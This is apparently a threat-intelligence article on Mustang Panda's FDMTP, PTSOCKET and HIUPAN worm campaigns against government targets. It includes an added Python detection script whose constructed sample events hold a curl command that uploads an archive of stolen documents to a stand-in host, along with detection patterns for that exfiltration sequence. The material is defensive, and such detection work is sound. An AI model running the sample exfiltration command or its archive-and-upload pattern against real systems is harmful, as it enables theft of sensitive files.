Chinese Hackers Deploy New Data Theft Malware in Government Attacks

The Chinese state-backed cyber espionage group Mustang Panda has launched a new wave of attacks using malware variants FDMTP and PTSOCKET to steal sensitive data from government networks. These attacks demonstrate the group's evolving tactics in cyber operations targeting government and non-government entities, especially in the Asia-Pacific region.

  • New Malware Deployment: Mustang Panda is using two newly identified malware strains:
    • FDMTP: A secondary control tool embedded in a DLL for malware delivery via DLL sideloading.
    • PTSOCKET: A custom file transfer tool based on TouchSocket over DMTP for data exfiltration.
  • Worm-based Attack Chain:
    • The group is spreading malware using a modified variant of the HIUPAN worm, which infects removable drives and hides its presence, leaving behind only a disguised executable file, "USBConfig.exe," to trick users.
    • The PUBLOAD malware stager, delivered via the worm, acts as the main control tool for network reconnaissance and data collection.

HIUPAN infection and spread

  • Spear-phishing Campaigns:
    • Mustang Panda uses fast-paced spear-phishing campaigns to deliver malware like DOWNBAIT and PULLBAIT through decoy documents, triggering in-memory execution of malicious code.
  • Data Targeting and Exfiltration:
    • Attackers focus on stealing .DOC, .XLS, .PDF, .PPT files, which are archived in RAR format.
    • PUBLOAD and PTSOCKET facilitate the exfiltration process, often using tools like cURL to send the stolen data.
  • Government Entities Under Attack:
    • The group has specifically targeted entities such as the military, police, foreign affairs agencies, and education sectors in recent campaigns.
  • Abuse of Cloud Services:
    • Mustang Panda has previously abused cloud services like Google Drive and is now suspected of using Microsoft OneDrive to introduce malware into government networks.
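The two behaviours called out above (a disguised "USBConfig.exe" launched from a removable drive, and office documents archived with RAR and then pushed out with cURL) can be turned into simple endpoint detections. The script below is an added example for this article, not code from the article or from any vendor; it runs over a constructed set of Sysmon-style process-creation events (the `ts`/`host`/`image`/`cmdline`/`drive_type` schema, hostnames, paths and the upload URL are all assumptions made for the example) and flags each host where either pattern appears.

```python
"""Added example (not from the article): triage constructed endpoint telemetry
for the two Mustang Panda behaviours the article describes:
  1. a process started from a removable drive under the decoy name USBConfig.exe
  2. .doc/.xls/.pdf/.ppt files archived into RAR, followed within a short
     window by an outbound curl upload from the same host
Event schema, hostnames, paths and the upload URL are constructed."""

import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

DOC_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".ppt", ".pptx"}
ARCHIVERS = {"rar.exe", "winrar.exe"}
CURL_UPLOAD_FLAGS = {"-F", "-T", "--upload-file", "--data-binary"}
EXFIL_WINDOW = timedelta(minutes=15)  # archive -> upload correlation window (assumed)

# Constructed process-creation events, Sysmon-like but simplified.
SAMPLE_EVENTS = [
    {"ts": "2024-09-01T08:00:01", "host": "ws-01", "image": r"E:\USBConfig.exe",
     "cmdline": r"E:\USBConfig.exe", "drive_type": "removable"},
    {"ts": "2024-09-01T08:00:02", "host": "ws-01", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "drive_type": "fixed"},
    {"ts": "2024-09-01T08:05:10", "host": "ws-01", "image": r"C:\Program Files\WinRAR\Rar.exe",
     "cmdline": r"Rar.exe a -r C:\Users\Public\out.rar C:\Users\a\Documents\*.doc C:\Users\a\Documents\*.pdf",
     "drive_type": "fixed"},
    {"ts": "2024-09-01T08:06:00", "host": "ws-01", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -F file=@C:\Users\Public\out.rar http://198.51.100.7/upload",
     "drive_type": "fixed"},
    # Benign: an admin archiving log files, with no upload afterwards.
    {"ts": "2024-09-01T09:00:00", "host": "ws-02", "image": r"C:\Program Files\WinRAR\Rar.exe",
     "cmdline": r"Rar.exe a backup.rar C:\logs\*.log", "drive_type": "fixed"},
]


def parse_ts(ts):
    return datetime.fromisoformat(ts)


def image_name(ev):
    """Lower-cased file name of the executable, handling Windows paths."""
    return ntpath.basename(ev["image"]).lower()


def is_removable_decoy(ev):
    """Rule 1: the worm's decoy executable started from a removable drive."""
    return ev["drive_type"] == "removable" and image_name(ev) == "usbconfig.exe"


def archives_documents(ev):
    """Rule 2a: rar 'a' (add) command whose arguments reference document files."""
    tokens = ev["cmdline"].split()
    if image_name(ev) not in ARCHIVERS or len(tokens) < 2 or tokens[1] != "a":
        return False
    lowered = ev["cmdline"].lower()
    return any(ext in lowered for ext in DOC_EXTENSIONS)


def is_curl_upload(ev):
    """Rule 2b: curl invoked with a flag that sends a file or body outbound."""
    if image_name(ev) not in {"curl.exe", "curl"}:
        return False
    return bool(CURL_UPLOAD_FLAGS.intersection(ev["cmdline"].split()))


def triage(events):
    """Return (host, rule, timestamp) alerts; rule 2 correlates per host in time order."""
    alerts = []
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)
    for host, evs in by_host.items():
        for i, ev in enumerate(evs):
            if is_removable_decoy(ev):
                alerts.append((host, "usb_worm_decoy", ev["ts"]))
            if archives_documents(ev):
                deadline = parse_ts(ev["ts"]) + EXFIL_WINDOW
                for later in evs[i + 1:]:
                    if parse_ts(later["ts"]) > deadline:
                        break
                    if is_curl_upload(later):
                        alerts.append((host, "doc_archive_then_curl", later["ts"]))
                        break
    return alerts


if __name__ == "__main__":
    for host, rule, ts in triage(SAMPLE_EVENTS):
        print(f"{ts} {host} {rule}")
```

Rule 1 is a plain string match and will fire on the decoy name regardless of what the binary does, so in production it should be paired with a hash or signer check on the file. Rule 2 is the more useful one: neither RAR nor cURL is suspicious alone, but a document-only archive followed minutes later by an upload from the same host is the exfiltration sequence the article describes, and the per-host time window keeps the ws-02 log backup from raising an alert.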

The Mustang Panda group continues to advance its malware deployment strategies, particularly focusing on highly targeted government operations. With sophisticated methods like spear-phishing, worm-based attacks, and cloud service abuse, they remain a persistent threat in the cybersecurity landscape. Organizations must prioritize threat intelligence, vigilance, and robust security measures to mitigate these evolving threats.